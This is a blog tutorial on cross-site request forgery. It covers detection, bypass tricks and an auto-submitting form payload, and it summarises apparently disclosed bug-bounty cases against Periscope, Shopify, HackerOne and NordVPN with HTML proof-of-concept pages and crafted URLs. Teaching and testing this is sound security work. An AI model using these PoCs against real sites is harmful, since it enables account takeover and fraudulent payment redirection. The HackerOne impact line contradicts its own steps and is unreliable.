Day 3 of 30 Days — 30 Vulnerability | CSRF

Day 3: Mastering CSRF — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs

[ In collaboration with Sunil Kumawat ( LinkedIn | Twitter)]

Hey geeks, it4chis3c here with one more write-up on tricks & tips to detect CSRF.

Cross-Site Request Forgery (CSRF) is a web security vulnerability that forces an end user to execute unwanted actions on a web application in which they are authenticated. This vulnerability can be exploited to perform a variety of malicious activities, such as transferring funds, changing account information, or even compromising a user’s account. Understanding where to look for CSRF, how to detect it, and how to defend against it is crucial for securing web applications.

CSRF vulnerabilities can be found in various areas of a web application, particularly where user input is processed and actions are executed without re-authentication. Common targets include:

Forms that update user information: Password reset forms, profile update forms, or any form that handles sensitive data.Actions that perform state changes: Account deletion, subscription modifications, or any action that changes the application’s state.Administrative functionalities: Where higher-privilege actions can be performed, such as user management or system settings.

These areas are often overlooked, making them prime candidates for CSRF attacks.

Detecting CSRF vulnerabilities involves checking if the application correctly validates that the action is being requested intentionally by the user. Here are the key methods:

Check for Anti-CSRF Tokens: The absence of CSRF tokens or the presence of poorly implemented tokens can indicate a vulnerability.Test for State-Changing Actions: Manually test or automate the submission of forms or requests from an external website to see if the action is carried out without user intent.Monitor Referrer Headers: Analyze if the application properly checks the Referer header, ensuring that the request is coming from an authorized source.

Automated tools like Burp Suite can be used to generate and test CSRF PoCs by identifying weak spots in the application.

To exploit a CSRF vulnerability, an attacker must craft a request that mimics a legitimate action. The common payloads and techniques include:

Form-Based Requests: Creating a form that automatically submits a POST request when loaded.Image Tag Exploitation: Using an <img> tag to trigger GET requests.Link-Based Attacks: Crafting malicious links that, when clicked, execute actions on behalf of the user.

Example payload:

<html>
<body>
<form action="http://vulnerable-website.com/update_profile" method="POST">
<input type="hidden" name="email" value="attacker@example.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

This code automatically submits the form to change the user’s email address when loaded in the user’s browser.

CSRF defenses can be bypassed if they are improperly implemented. Common bypass techniques include:

Token Stealing or Predictability: If CSRF tokens are predictable, or if they can be extracted via XSS or other means, they can be used to forge requests.Referrer Header Manipulation: Some applications rely on referrer headers for CSRF protection. These headers can be manipulated or spoofed in certain scenarios.Lack of Double Submit Cookies: If the application does not use the double submit cookie method correctly, the protection can be bypassed.

Description: Periscope’s Android app allows for direct actions via internal deep links without user confirmation, making it vulnerable to CSRF attacks.

Steps:

Use the deep link pscp://user/<user-id>/follow.Embed it in a web page as follows:<!DOCTYPE html>
<html>
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
</html>

3. When the victim clicks this link from their Android device, the deep link is executed, causing them to follow the user without confirmation.

Impact: An attacker can force users to follow specific accounts, potentially compromising their follow list or influencing the content they see.

Description: Shopify’s CSRF protection for adding PayPal as a payment provider can be bypassed due to the use of a static merchantId.

Steps:

Visit https://YOURDOMAIN.myshopify.com/admin/settings/payments and disconnect any existing PayPal account.Click the link to activate PayPal express checkout.Note the merchantId in the URL, which is static for the store.Use the merchantId in the following link:https://YOURSUBDOMAIN.myshopify.com/admin/payments/complete_paypal_incontext_oauth/41?merchantId=REPLACEME&merchantIdInPayPal=5NS8DHQCFGT84&permissionsGranted=true&accountStatus=BUSINESS_ACCOUNT&consentStatus=true&productIntentID=addipmt&productIntentId=addipmt&isEmailConfirmed=true

Impact: The attacker’s PayPal account gets linked to the victim’s store, allowing them to receive payments fraudulently.

Description: HackerOne’s login process can be exploited via CSRF due to improper verification of the authenticity_token.

Steps:

Go to https://hackerone.com/users/sign_in.Capture the login request and remove the authenticity_token.Use the following CSRF PoC:<html>
<body>
<form action="https://hackerone.com/users/sign_in" method="POST">
<input type="hidden" name="user[email]" value="youremail" />
<input type="hidden" name="user[password]" value="yourpassword" />
<input type="hidden" name="user[remember_me]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4. The victim will log in to the attacker’s account without proper authentication.

Impact: The attacker can log in to the victim’s account and perform actions without their knowledge.

Description: NordVPN’s profile settings allow for CSRF to change the user’s password.

Steps:

Use the following CSRF PoC:<html>
<body>
<form action="https://nordvpn.com/profile/" method="POST">
<input type="hidden" name="tmpl" value="settings" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="password_confirmation" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>When the victim visits the page, their password will be changed.

Impact: An attacker can change the victim’s password, gaining unauthorized access to their account.

If you are still reading & find this blog interesting then do follow me on Twitter & LinkedIn for more write-ups

Stay tuned for Day 4, where we’ll dive into another vulnerability!